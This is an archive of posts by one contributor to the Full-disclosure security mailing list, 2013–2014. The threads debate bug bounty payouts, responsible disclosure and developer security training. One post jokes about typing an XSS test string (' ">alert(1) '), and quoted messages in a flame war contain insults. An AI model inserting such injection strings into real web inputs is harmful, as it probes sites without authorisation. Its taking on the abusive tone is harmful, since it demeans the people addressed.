Re: [Full-disclosure] Hacking in Schools

2014-02-25 Thread Benji
Horse riding around schools won't be allowed, if they wouldn't let me bring
a paintball gun in, they won't allow this.
On 25 Feb 2014 18:19, "Pete Herzog"  wrote:

> How to teach hacking in school and open up education:
>
> https://opensource.com/education/14/2/teach-hacking-schools-open-education
>
> Sincerely,
> -pete.
>
> --
> Pete Herzog - Managing Director - p...@isecom.org
> ISECOM - Institute for Security and Open Methodologies
>
> Need impartial, expert advice? Request a call:
> http://clarity.fm/peteherzog
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Re: [Full-disclosure] Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration

2014-02-05 Thread Benji
s/with their Facebook or Twitter credentials//g


On Tue, Feb 4, 2014 at 10:51 PM, security curmudgeon
wrote:

>
> : From: Mark Litchfield 
>
> : As previously stated, I would post an update for Ektron CMS bypassing
> : the security fix.
>
> : A full step by step with the usual screen shots can be found at -
> : http://www.securatary.com/vulnerabilities
>
> Uh... you expect people to login to your site with their Facebook or
> Twitter credentials, to access these advisories?
>
>

Re: [Full-disclosure] Serious Yahoo bug discovered. Researchers rewarded with $12.50

2013-10-03 Thread Benji
Semi related, I'd like to know at what $ amount you guys value your ability
to type variations of ' ">alert(1) ' . I value mine at
around $1000 a time because the characters are made of gold dust and I
spent most of my life learning to type.

:)


On Thu, Oct 3, 2013 at 9:09 AM, Benji  wrote:

> Yahoo have now started a big bounty formally instead of just trying to be
> nice (
> http://yahoodevelopers.tumblr.com/post/62953984019/so-im-the-guy-who-sent-the-t-shirt-out-as-a-thank-you).
>
> You can all go back to worrying about your bank balances now, and fitting
> the stereotype that all you (infosec) care about is money and not helping
> the world.
> On 3 Oct 2013 08:41, "Benji"  wrote:
>
>> No-one is making you do anything.
>>
>> If you don't feel like helping for free, like in the old days (2 years
>> ago..) then don't
>>
>> Jeeze, I remember when you guys used to moan that a company had no
>> security policy, now it's that "the amount offered is too low for me from a
>> company that has no formal bounty and was probably just trying to be nice
>> to get out of bed for".
>>
>> Nice to meet you Justin Bieber of the infosec community.
>> On 3 Oct 2013 08:35, "adam"  wrote:
>>
>>> bradon nailed it, it has nothing to do with entitlement, it has to do
>>> with incentive. $12.50 is not only _not_ incentive, but it's outright
>>> insulting, thus having the exact opposite effect.
>>>
>>>
>>> On Wed, Oct 2, 2013 at 10:34 AM, Jordon Bedwell wrote:
>>>
>>>> On Wed, Oct 2, 2013 at 10:32 AM, Ian Hayes 
>>>> wrote:
>>>> > Sounds like someone has an overdeveloped sense of self-entitlement.
>>>>
>>>> Sounds like somebody is failing at trolling.
>>>>

Re: [Full-disclosure] Serious Yahoo bug discovered. Researchers rewarded with $12.50

2013-10-03 Thread Benji
Yahoo have now started a big bounty formally instead of just trying to be
nice (
http://yahoodevelopers.tumblr.com/post/62953984019/so-im-the-guy-who-sent-the-t-shirt-out-as-a-thank-you).

You can all go back to worrying about your bank balances now, and fitting
the stereotype that all you (infosec) care about is money and not helping
the world.
On 3 Oct 2013 08:41, "Benji"  wrote:

> No-one is making you do anything.
>
> If you don't feel like helping for free, like in the old days (2 years
> ago..) then don't
>
> Jeeze, I remember when you guys used to moan that a company had no
> security policy, now it's that "the amount offered is too low for me from a
> company that has no formal bounty and was probably just trying to be nice
> to get out of bed for".
>
> Nice to meet you Justin Bieber of the infosec community.
> On 3 Oct 2013 08:35, "adam"  wrote:
>
>> bradon nailed it, it has nothing to do with entitlement, it has to do
>> with incentive. $12.50 is not only _not_ incentive, but it's outright
>> insulting, thus having the exact opposite effect.
>>
>>
>> On Wed, Oct 2, 2013 at 10:34 AM, Jordon Bedwell wrote:
>>
>>> On Wed, Oct 2, 2013 at 10:32 AM, Ian Hayes 
>>> wrote:
>>> > Sounds like someone has an overdeveloped sense of self-entitlement.
>>>
>>> Sounds like somebody is failing at trolling.
>>>

Re: [Full-disclosure] Serious Yahoo bug discovered. Researchers rewarded with $12.50

2013-10-03 Thread Benji
No-one is making you do anything.

If you don't feel like helping for free, like in the old days (2 years
ago..) then don't

Jeeze, I remember when you guys used to moan that a company had no security
policy, now it's that "the amount offered is too low for me from a company
that has no formal bounty and was probably just trying to be nice to get
out of bed for".

Nice to meet you Justin Bieber of the infosec community.
On 3 Oct 2013 08:35, "adam"  wrote:

> bradon nailed it, it has nothing to do with entitlement, it has to do with
> incentive. $12.50 is not only _not_ incentive, but it's outright insulting,
> thus having the exact opposite effect.
>
>
> On Wed, Oct 2, 2013 at 10:34 AM, Jordon Bedwell wrote:
>
>> On Wed, Oct 2, 2013 at 10:32 AM, Ian Hayes 
>> wrote:
>> > Sounds like someone has an overdeveloped sense of self-entitlement.
>>
>> Sounds like somebody is failing at trolling.
>>

Re: [Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)

2013-04-23 Thread Benji
I look forward to seeing who wins in this argument over personal opinion.


On Tue, Apr 23, 2013 at 4:12 PM, Gregory Boddin  wrote:

> You have to think about end-users as well ... Those are impacted first,
> not the vendors.
>
>
>
>
>
> On 23 April 2013 16:51, Georgi Guninski  wrote:
>
>> Completely disagree.
>>
>> IMHO nobody should bother negotiating with terrorist vendors.
>>
>> Q: What responsibility vendors have?
>> A: Zero. Check their disclaimers.
>>
>>
>> On Tue, Apr 23, 2013 at 04:14:53PM +0200, Gregory Boddin wrote:
>> > That's indeed not rocket science.
>> >
>> > Nobody should release their disclosure/exploit (or give hint about it)
>> > in the wild before letting the vendor fix it.
>> >
>> > There's already enough blackhats out there selling/using those.
>> >
>> > I sure hope I am not the only person in the list who wishes responsible
>> > > disclosure.
>> > >
>> > > ---
>> > > Henri Salo
>> > >

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-22 Thread Benji
It was a perfect example of a largely deployed application which utilises 
security engineers, and has pushed patches/code which was ineffective. My point 
was that bugs like that are a lot easier to sort in a design or development 
stage than after the fact when remediation time is tight, and that a 'QA' 
process of any type will not make up for developer mistakes.

Sent from my iPhone.

On 22 Apr 2013, at 07:39, Jeffrey Walton  wrote:

> On Sat, Apr 20, 2013 at 7:37 PM, Benji  wrote:
>> Because security engineers are different to a QA department you originally
>> suggested, and you seem to be very ideologist about the scenarios. As we've
>> seen, Oracle's Java product has security engineers and this has not
>> prevented flaws.
> Oracle is probably not a good example since it leaves known flaws in
> the code base.
> 
> http://www.h-online.com/security/news/item/Java-7-Update-21-closes-security-holes-and-restricts-applets-1843558.html:
> 
> The warnings for Java applets now come in two types: an applet that
> has a valid certificate generates a warning dialog with the Java logo
> in it and details of the applet's certificate, but an applet that is
> signed with an invalid certificate, is unsigned or self-signed, will
> generate a warning with a yellow shield and warning triangle which is
> designed to recommend that the applet should not be run. There is a
> problem though with the certificate checking; as The H reported in
> March, criminals were using revoked certificates as part of their
> attacks and the Java runtime was doing nothing to check the validity
> of certificates. On the latest update of Java, this has not changed
> either; online validation and revocation checks are still off by
> default.



Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji
Sorry, by flaws, I should have said, *"has not prevented bad code/ineffective
patches from being pushed out"


On Sun, Apr 21, 2013 at 12:41 AM, Benji  wrote:

> (For example,
> http://webcache.googleusercontent.com/search?q=cache:2cXGaaHnqyMJ:www.computerworld.com/s/article/9235954/Researchers_find_critical_vulnerabilities_in_Java_7_Update_11+&cd=8&hl=en&ct=clnk&gl=uk)
>
>
> On Sun, Apr 21, 2013 at 12:37 AM, Benji  wrote:
>
>> Because security engineers are different to a QA department you
>> originally suggested, and you seem to be very ideologist about the
>> scenarios. As we've seen, Oracle's Java product has security engineers and
>> this has not prevented flaws.
>>
>>
>> On Sun, Apr 21, 2013 at 12:34 AM, Bryan  wrote:
>>
>>> "Your 5-chained-0day-to-code-exec, in my opinion, does not count as
>>> negligence  and comes from the developer effectively not being a
>>> security engineer"
>>> Solution: Hire security engineers.
>>>
>>> "In my opinion we are not at the stage in industry where we can
>>> consider/expect any developer to think through each implication of
>>> each feature they implement"
>>> Solution: Hire security engineers to think through each implication.
>>>
>>> Why are we disagreeing?
>>>
>>> On Sun, Apr 21, 2013 at 12:11:51AM +0100, Benji wrote:
>>> >Your proposition was that developers will always make mistakes and
>>> >introduce stupid problems, so a QA team/process is necessary. While I
>>> >agree that there should be a QA/'audit' at some point, it shouldn't be
>>> >the stage that is relied on. Applications that are flawed from the
>>> >design stage onwards will become expenditure blackholes, especially
>>> >after going through any QA process which should highlight these.
>>> >Potentially yes, but most of the larger companies appear to already do
>>> >this. A quick search through google shows that Oracle at least already
>>> >have, and/or are actively hiring security engineers involved with Java
>>> >(for example).
>>> >Flaws will always pop up and I think we may now be bordering on
>>> >discussing what counts as negligence in some cases. Your
>>> >5-chained-0day-to-code-exec, in my opinion, does not count as
>>> >negligence and comes from the developer effectively not being a
>>> >security engineer, but doing the job of a developer. In my opinion we
>>> >are not at the stage in industry where we can consider/expect any
>>> >developer to think through each implication of each feature they
>>> >implement, without a strong security background as much as we may
>>> >appreciate it. Negligence in my opinion of security vulnerabilities is
>>> >having obvious format string bugs/buffer overflows when handling user
>>> >input for example, or incorrect permissions, or just a lack of
>>> >consideration to obvious problems. Developer training should pick up
>>> >on the obvious bugs, or at least give developers an understanding of
>>> >how to handle users/user input in a safe manner, and know the
>>> >implications of not doing so.
>>> >
>>> >On Sat, Apr 20, 2013 at 11:58 PM, Bryan wrote:
>>> >
>>> >  I think the definition of 'needless staff' highly depends on whether
>>> >  you want 'vulnerable software'.
>>> >
>>> >  Educating current developers is absolutely a good idea, but still not
>>> >  foolproof. The bottom line is that if you want safe software, you
>>> >  need to invest in proper development. As far as I am concerned, for
>>> >  large companies like Adobe and Oracle, where software bugs in your
>>> >  product have a direct impact on the safety of your customers, that
>>> >  involves hiring specialized staff.
>>>
>>
>>
>

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji
(For example,
http://webcache.googleusercontent.com/search?q=cache:2cXGaaHnqyMJ:www.computerworld.com/s/article/9235954/Researchers_find_critical_vulnerabilities_in_Java_7_Update_11+&cd=8&hl=en&ct=clnk&gl=uk)


On Sun, Apr 21, 2013 at 12:37 AM, Benji  wrote:

> Because security engineers are different to a QA department you originally
> suggested, and you seem to be very ideologist about the scenarios. As we've
> seen, Oracle's Java product has security engineers and this has not
> prevented flaws.
>
>
> On Sun, Apr 21, 2013 at 12:34 AM, Bryan  wrote:
>
>> "Your 5-chained-0day-to-code-exec, in my opinion, does not count as
>> negligence  and comes from the developer effectively not being a
>> security engineer"
>> Solution: Hire security engineers.
>>
>> "In my opinion we are not at the stage in industry where we can
>> consider/expect any developer to think through each implication of
>> each feature they implement"
>> Solution: Hire security engineers to think through each implication.
>>
>> Why are we disagreeing?
>>
>> On Sun, Apr 21, 2013 at 12:11:51AM +0100, Benji wrote:
>> >Your proposition was that developers will always make mistakes and
>> >introduce stupid problems, so a QA team/process is necessary. While I
>> >agree that there should be a QA/'audit' at some point, it shouldn't be
>> >the stage that is relied on. Applications that are flawed from the
>> >design stage onwards will become expenditure blackholes, especially
>> >after going through any QA process which should highlight these.
>> >Potentially yes, but most of the larger companies appear to already do
>> >this. A quick search through google shows that Oracle at least already
>> >have, and/or are actively hiring security engineers involved with Java
>> >(for example).
>> >Flaws will always pop up and I think we may now be bordering on
>> >discussing what counts as negligence in some cases. Your
>> >5-chained-0day-to-code-exec, in my opinion, does not count as
>> >negligence and comes from the developer effectively not being a
>> >security engineer, but doing the job of a developer. In my opinion we
>> >are not at the stage in industry where we can consider/expect any
>> >developer to think through each implication of each feature they
>> >implement, without a strong security background as much as we may
>> >appreciate it. Negligence in my opinion of security vulnerabilities is
>> >having obvious format string bugs/buffer overflows when handling user
>> >input for example, or incorrect permissions, or just a lack of
>> >consideration to obvious problems. Developer training should pick up
>> >on the obvious bugs, or at least give developers an understanding of
>> >how to handle users/user input in a safe manner, and know the
>> >implications of not doing so.
>> >
>> >On Sat, Apr 20, 2013 at 11:58 PM, Bryan wrote:
>> >
>> >  I think the definition of 'needless staff' highly depends on whether
>> >  you want 'vulnerable software'.
>> >
>> >  Educating current developers is absolutely a good idea, but still not
>> >  foolproof. The bottom line is that if you want safe software, you
>> >  need to invest in proper development. As far as I am concerned, for
>> >  large companies like Adobe and Oracle, where software bugs in your
>> >  product have a direct impact on the safety of your customers, that
>> >  involves hiring specialized staff.
>>
>
>

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji
Because security engineers are different to a QA department you originally
suggested, and you seem to be very ideologist about the scenarios. As we've
seen, Oracle's Java product has security engineers and this has not
prevented flaws.


On Sun, Apr 21, 2013 at 12:34 AM, Bryan  wrote:

> "Your 5-chained-0day-to-code-exec, in my opinion, does not count as
> negligence  and comes from the developer effectively not being a
> security engineer"
> Solution: Hire security engineers.
>
> "In my opinion we are not at the stage in industry where we can
> consider/expect any developer to think through each implication of
> each feature they implement"
> Solution: Hire security engineers to think through each implication.
>
> Why are we disagreeing?
>
> On Sun, Apr 21, 2013 at 12:11:51AM +0100, Benji wrote:
> >Your proposition was that developers will always make mistakes and
> >introduce stupid problems, so a QA team/process is necessary. While I
> >agree that there should be a QA/'audit' at some point, it shouldn't be
> >the stage that is relied on. Applications that are flawed from the
> >design stage onwards will become expenditure blackholes, especially
> >after going through any QA process which should highlight these.
> >Potentially yes, but most of the larger companies appear to already do
> >this. A quick search through google shows that Oracle at least already
> >have, and/or are actively hiring security engineers involved with Java
> >(for example).
> >Flaws will always pop up and I think we may now be bordering on
> >discussing what counts as negligence in some cases. Your
> >5-chained-0day-to-code-exec, in my opinion, does not count as
> >negligence and comes from the developer effectively not being a
> >security engineer, but doing the job of a developer. In my opinion we
> >are not at the stage in industry where we can consider/expect any
> >developer to think through each implication of each feature they
> >implement, without a strong security background as much as we may
> >appreciate it. Negligence in my opinion of security vulnerabilities is
> >having obvious format string bugs/buffer overflows when handling user
> >input for example, or incorrect permissions, or just a lack of
> >consideration to obvious problems. Developer training should pick up
> >on the obvious bugs, or at least give developers an understanding of
> >how to handle users/user input in a safe manner, and know the
> >implications of not doing so.
> >
> >On Sat, Apr 20, 2013 at 11:58 PM, Bryan wrote:
> >
> >  I think the definition of 'needless staff' highly depends on whether
> >  you want 'vulnerable software'.
> >
> >  Educating current developers is absolutely a good idea, but still not
> >  foolproof. The bottom line is that if you want safe software, you
> >  need to invest in proper development. As far as I am concerned, for
> >  large companies like Adobe and Oracle, where software bugs in your
> >  product have a direct impact on the safety of your customers, that
> >  involves hiring specialized staff.
>

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji
Your proposition was that developers will always make mistakes and
introduce stupid problems, so a QA team/process is necessary. While I agree
that there should be a QA/'audit' at some point, it shouldn't be the stage
that is relied on. Applications that are flawed from the design stage
onwards will become expenditure blackholes, especially after going through
any QA process which should highlight these.

Potentially yes, but most of the larger companies appear to already do
this. A quick search through google shows that Oracle at least already have,
and/or are actively hiring security engineers involved with Java (for
example).

Flaws will always pop up and I think we may now be bordering on discussing
what counts as negligence in some cases. Your 5-chained-0day-to-code-exec,
in my opinion, does not count as negligence and comes from the developer
effectively not being a security engineer, but doing the job of a
developer. In my opinion we are not at the stage in industry where we can
consider/expect any developer to think through each implication of each
feature they implement, without a strong security background as much as we
may appreciate it. Negligence in my opinion of security vulnerabilities is
having obvious format string bugs/buffer overflows when handling user input
for example, or incorrect permissions, or just a lack of consideration to
obvious problems. Developer training should pick up on the obvious bugs, or
at least give developers an understanding of how to handle users/user input
in a safe manner, and know the implications of not doing so.




On Sat, Apr 20, 2013 at 11:58 PM, Bryan  wrote:

> I think the definition of 'needless staff' highly depends on whether you
> want 'vulnerable software'.
>
> Educating current developers is absolutely a good idea, but still not
> foolproof. The bottom line is that if you want safe software, you need
> to invest in proper development. As far as I am concerned, for large
> companies like Adobe and Oracle, where software bugs in your product
> have a direct impact on the safety of your customers, that involves
> hiring specialized staff.
>
> On Sat, Apr 20, 2013 at 11:49:22PM +0100, Benji wrote:
> >    (in my opinion)
> >
> >On Sat, Apr 20, 2013 at 11:42 PM, Benji  wrote:
> >
> >  Yes, a better idea would be to educate and inform developers. At a
> >  business level at least this will a) save extra expenditure on
> >  needless staff and extra departments b) result in faster turn arounds
> >  as there's then less time needed for remediation. At a technical
> >  level, it will at least result in less 'dumb' bugs (assuming training
> >  and education is effective and relevant).
> >  I think at this point expecting software to have 0 flaws or being
> >  under the illusion that software will ever be flawless in its current
> >  state is like wishing really hard before bed every night that genetics
> >  and evolution will make you a unicorn.
> >
> >  On Sat, Apr 20, 2013 at 11:35 PM, Bryan wrote:
> >
> >I am just saying that developers and designers make mistakes and
> >that there is no getting around that. Rather than relying on the
> >benevolent 0day researchers from the sky publicly disclosing their
> >vulnerabilities, more responsible QA testing within the company will
> >prevent many of these vulnerabilities from occurring in the first
> >place. Or do you have a better idea?
>

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji
(in my opinion)


On Sat, Apr 20, 2013 at 11:42 PM, Benji  wrote:

> Yes, a better idea would be to educate and inform developers. At a
> business level at least this will a) save extra expenditure on needless
> staff and extra departments b) result in faster turn arounds as there's
> then less time needed for remediation. At a technical level, it will
> at least result in less 'dumb' bugs (assuming training and education is
> effective and relevant).
>
> I think at this point expecting software to have 0 flaws or being under
> the illusion that software will ever be flawless in its current state is
> like wishing really hard before bed every night that genetics and evolution
> will make you a unicorn.
>
>
> On Sat, Apr 20, 2013 at 11:35 PM, Bryan  wrote:
>
>> I am just saying that developers and designers make mistakes and
>> that there is no getting around that. Rather than relying on the
>> benevolent 0day researchers from the sky publicly disclosing their
>> vulnerabilities, more responsible QA testing within the company will
>> prevent many of these vulnerabilities from occurring in the first
>> place. Or do you have a better idea?
>>
>> On Sat, Apr 20, 2013 at 11:06:33PM +0100, Benji wrote:
>> >Let me expand on that, otherwise I'm sure it's unclear.
>> >Is your suggestion, to remove the worry of developers making mistakes,
>> >to add another human process after it and rely on this to remove all
>> >mistakes?
>> >
>> >On Sat, Apr 20, 2013 at 10:54 PM, Benji wrote:
>> >
>> >  Yes, after the people that can make mistakes, we should have people
>> >  that are incapable of making mistakes. I totally agree, what a good
>> >  idea.
>> >
>> >  On Sat, Apr 20, 2013 at 10:28 PM, Bryan wrote:
>> >
>> >The code monkeys can make mistakes as long as there is a process to
>> >detect and remedy their mistakes before things get shipped. Hiring
>> >decent application security researchers to audit their code would be a
>> >good start.
>> >On Sat, Apr 20, 2013 at 09:51:40AM -0400, Lee wrote:
>> >> On 4/20/13, Sergio Alvarez wrote:
>> >> > Why instead of discussing about ethics about 0days, don't you
>> >> > discuss about responsible DEVELOPMENT instead?
>> >> > If products were properly designed and developed there wouldn't
>> >> > be 0days for them, would there?
>> >>
>> >> Only if the designers & developers were perfect and never made
>> >> mistakes.
>> >

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji
Yes, a better idea would be to educate and inform developers. At a business
level at least this will a) save extra expenditure on needless staff and
extra departments b) result in faster turn arounds as there's then less
time needed for remediation. At a technical level, it will at least result
in less 'dumb' bugs (assuming training and education is effective and
relevant).

I think at this point expecting software to have 0 flaws or being under the
illusion that software will ever be flawless in its current state is like
wishing really hard before bed every night that genetics and evolution will
make you a unicorn.


On Sat, Apr 20, 2013 at 11:35 PM, Bryan  wrote:

> I am just saying that developers and designers make mistakes and
> that there is no getting around that. Rather than relying on the
> benevolent 0day researchers from the sky publicly disclosing their
> vulnerabilities, more responsible QA testing within the company will
> prevent many of these vulnerabilities from occurring in the first
> place. Or do you have a better idea?
>
> On Sat, Apr 20, 2013 at 11:06:33PM +0100, Benji wrote:
> >Let me expand on that, otherwise I'm sure it's unclear.
> >Is your suggestion, to remove the worry of developers making mistakes,
> >to add another human process after it and rely on this to remove all
> >mistakes?
> >
> >On Sat, Apr 20, 2013 at 10:54 PM, Benji wrote:
> >
> >  Yes, after the people that can make mistakes, we should have people
> >  that are incapable of making mistakes. I totally agree, what a good
> >  idea.
> >
> >  On Sat, Apr 20, 2013 at 10:28 PM, Bryan wrote:
> >
> >The code monkeys can make mistakes as long as there is a process to
> >detect and remedy their mistakes before things get shipped. Hiring
> >decent application security researchers to audit their code would be a
> >good start.
> >On Sat, Apr 20, 2013 at 09:51:40AM -0400, Lee wrote:
> >> On 4/20/13, Sergio Alvarez wrote:
> >> > Why instead of discussing about ethics about 0days, don't you
> >> > discuss about responsible DEVELOPMENT instead?
> >> > If products were properly designed and developed there wouldn't
> >> > be 0days for them, would there?
> >>
> >> Only if the designers & developers were perfect and never made
> >> mistakes.

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji
Let me expand on that, otherwise I'm sure it's unclear.

Is your suggestion, to remove the worry of developers making mistakes, to
add another human process after it and rely on this to remove all mistakes?


On Sat, Apr 20, 2013 at 10:54 PM, Benji  wrote:

> Yes, after the people that can make mistakes, we should have people that
> are incapable of making mistakes. I totally agree, what a good idea.
>
>
> On Sat, Apr 20, 2013 at 10:28 PM, Bryan  wrote:
>
>> The code monkeys can make mistakes as long as there is a process to
>> detect and remedy their mistakes before things get shipped. Hiring
>> decent application security researchers to audit their code would be a
>> good start.
>>
>> On Sat, Apr 20, 2013 at 09:51:40AM -0400, Lee wrote:
>> > On 4/20/13, Sergio Alvarez  wrote:
>> > > Why instead of discussing about ethics about 0days, don't you discuss
>> > > about responsible DEVELOPMENT instead?
>> > > If products were properly designed and developed there wouldn't be
>> > > 0days for them, would them?
>> >
>> > Only if the designers & developers were perfect and never made mistakes.
>>

Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)

2013-04-20 Thread Benji
Yes, after the people that can make mistakes, we should have people that
are incapable of making mistakes. I totally agree, what a good idea.


On Sat, Apr 20, 2013 at 10:28 PM, Bryan  wrote:

> The code monkeys can make mistakes as long as there is a process to
> detect and remedy their mistakes before things get shipped. Hiring
> decent application security researchers to audit their code would be a
> good start.
>
> On Sat, Apr 20, 2013 at 09:51:40AM -0400, Lee wrote:
> > On 4/20/13, Sergio Alvarez  wrote:
> > > Why instead of discussing about ethics about 0days, don't you discuss
> > > about responsible DEVELOPMENT instead?
> > > If products were properly designed and developed there wouldn't be
> > > 0days for them, would them?
> >
> > Only if the designers & developers were perfect and never made mistakes.
>

Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (copskillingcivillians)

2013-03-29 Thread Benji
STOP STRESSING YOUR HEART JERRY, OR THAT OPERATION YOU HAD ON IT WONT SAVE
YOU


On Fri, Mar 29, 2013 at 4:00 PM, Gage Bystrom wrote:

> Personal habit when it comes to posting on lists that has nothing to do
> with integrity.
> On Mar 29, 2013 8:55 AM, "Jerry dePriest"  wrote:
>
>> for 1 he posted it to the list instead of emailing me direct, Mr nosey
>> pants. I see nothing has changed on this list except the level of
>> integrity...
>>
>> - Original Message -
>> *From:* Gage Bystrom 
>> *To:* full-disclosure@lists.grok.org.uk
>> *Sent:* Friday, March 29, 2013 10:51 AM
>> *Subject:* Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly
>> (copskillingcivillians)
>>
>> If you don't tell people what to post or not post, why are you telling
>> them to not post how they disagree with you on if this story should be
>> posted to FD?
>>
>> Hum dee dum dum
>> On Mar 29, 2013 5:28 AM, "Jerry dePriest"  wrote:
>>
>>> 90% of the posts on here are illegal in some form or fashion. It's not a
>>> personal attack, it's full disclosure on how one can track info using
>>> http://archive.org/index.php no one looked at that aspect.
>>>
>>> To Johnny law dog: The software maker can over ride what you listed with
>>> their own disclaimer so thats bullshit. Ask Kevin Mitnik...
>>>
>>> Don't tell me what to post, I don't tell you what to post or what not to
>>> post...
>>>
>>> thanks for keeping this thread alive. You could have just stfu, but
>>> no
>>>
>>> I said sorry and dropped it, you're the ones keeping it going, THANKS!
>>> 'ssoles
>>>
>>>
>>> - Original Message -
>>> *From:* Jeffrey Walton 
>>> *To:* Jerry dePriest 
>>> *Cc:* Full Disclosure List 
>>> *Sent:* Friday, March 29, 2013 7:10 AM
>>> *Subject:* Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops
>>> killingcivillians)
>>>
>>> > Go do illegal activities such as reverse engineering
>>> The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and
>>> security testing and evaluation. The RE exemption is in Section 1205
>>> (f) REVERSE ENGINEERING). The ST&E exemption is in Section 1205 (i)
>>> SECURITY TESTING.
>>>
>>> Jeff
>>>
>>> On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest  wrote:
>>>
>>>> who made you the boss of FD? I've seen similar posts and bullshit like
>>>> April fools jokes posing as 0-day and such. if you don't like it, move
>>>> along. Go do illegal activities such as reverse engineering for 0-day
>>>> exploits or holes in facebook so you can scare the rubes.
>>>>
>>>> man, try to do something good and I get blasted... Bryan, there is
>>>> a short bridge waiting for you to take a long walk... By the looks of your
>>>> myspace page you're anti social and a troll... Well, you got me. I forgot
>>>> New Zealand is just another offshoot of the penal colony Australia used to
>>>> be. You can't help it, it's in your genes...
>>>>
>>>> Spamming? UCE my mailings were not. They were informative, like this
>>>> list is supposed to be. You liken my postings to the likes of Netdev and
>>>> other assholes who truly UCE'd this list to death.
>>>>
>>>> btw this is the PERFECT place for this type of discussion. Who made you
>>>> the fucking moderator of fd? You do a horrible job...
>>>> I have been on this list since 2005... My postings are gold compared to
>>>> the viri and other 'sploits people try to con people into.
>>>>
>>>> 1. Let's discuss how his facebook account was hacked along with
>>>> others so no forensics are available. (Feds, gotta love em)
>>>> 2. Let's discuss how her facebook account was hacked to say she took a
>>>> bunch of pills THEN shot herself.
>>>> 3. Let's discuss what a douchebag you are for downplaying something
>>>> by putting it into the scope of a chain letter? That's confirmation you are
>>>> in fact a true douchebag...
>>>>
>>>> FOAD
>>>>
>>>> Antisocial troll... Go remove your myspace page and maybe you wont look
>>>> like such an ass, whole.
>>>>
>>>
>>>

Re: [Full-disclosure] Fw: Fw: News Delivery Report (Failure)

2013-03-29 Thread Benji
>> of hacker script punks thinking

>> FOAD

hurhurhur


On Fri, Mar 29, 2013 at 1:10 PM, Jerry dePriest  wrote:

> I could spend the whole day pointing out stuff that "isn't pertinent"
> to this list.
>
> at least I have a moral motive, not just a bunch of hacker script punks
> thinking it's cool to have juveniles do their bidding.
>
> FOAD

Re: [Full-disclosure] Fw: (no subject)

2013-03-29 Thread Benji
Like the one you just sent?


On Fri, Mar 29, 2013 at 1:07 PM, Jerry dePriest  wrote:

> wow, another important fucking post that has NOTHING to do WHAT SO EVER
> with FD. farging hypocrites...
>
> I could spend HOURS pointing out the bullshit posts, at least mine has
> merit.
>
> FOAD
>
> - Original Message -
> *From:* Gary Baribault 
> *To:* full-disclosure@lists.grok.org.uk
> *Sent:* Thursday, November 15, 2012 8:48 AM
> *Subject:* Re: [Full-disclosure] (no subject)
>
> Now that was mean :-) Funny .. but mean LOL
>
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
>
> On 11/15/2012 08:42 AM, Peter Osterberg wrote:
>
> In most case there are keyboards attached to computers, they provide an
> excellent opportunity for providing content to your mails.
>
> On 2012-11-15 13:02, mohit tyagi wrote:
>
>
>

Re: [Full-disclosure] Deutsche Post Security Cup 2013

2013-03-20 Thread Benji
>> I think its getting ridiculous, if you don't have a name in the industry
>> you're getting sued for the vast majority of bugs you solve...
>> And on the other hand, those same companies give away 3-15.000 for a
>> single bug if the researcher happens to be known :|

Examples please


On Wed, Mar 20, 2013 at 1:04 PM, Daniel Preussker wrote:

> On 20.03.2013, at 13:34, Hurgel Bumpf wrote:
>
> > Most of the subscribers are single individuals. Why bother sending them
> > an invitation when 99.9% are rejected because they don't have a "company"
> > or a "big team". There are a lot of valuable and competent individuals out
> > there which are rejected because of their team size in the first place.
> > Don't be so closed-minded, most freaks don't have friends and/or a cr3w.
> >
> > Thanks
> >
> > Bonan the bavarian
>
>
> This is a true word.
> I gave up CTF, Cups and similar because nobody cares for the small
> "hacker"...
> They always reject the New-Ones, ones that haven't had 20 0-days on his
> account or a shiny company name and is alone out in the wild.
>
> I think its getting ridiculous, if you don't have a name in the industry
> you're getting sued for the vast majority of bugs you solve...
> And on the other hand, those same companies give away 3-15.000 for a
> single bug if the researcher happens to be known :|
>
> Now I don't intend to start a shitstorm or a war here...
>
> Kind regards from the U-Bahn,
>
> Daniel Preussker
>
> [ Security Consultant, Network & Protocol Security and Cryptography
> [ LPI & Novell Certified Linux Engineer and Researcher
> [ +49 178 600 96 30
> [ dan...@preussker.net
> [ http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x87E736968E490AA1

Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution

2013-03-06 Thread Benji
Replace you with they if you want.

Re: [Full-disclosure] SANS PHP Port Scanner Remote Code Execution

2013-03-06 Thread Benji
Actually, adding input sanitisation really wouldn't increase the code size
that much. Are you just incompetent?


On Wed, Mar 6, 2013 at 7:46 AM, Źmicier Januszkiewicz  wrote:

> Dear list,
>
> Well, I suppose this had to be a proof-of-concept piece of code to
> demonstrate how port scanning can be done in PHP, not a production-grade
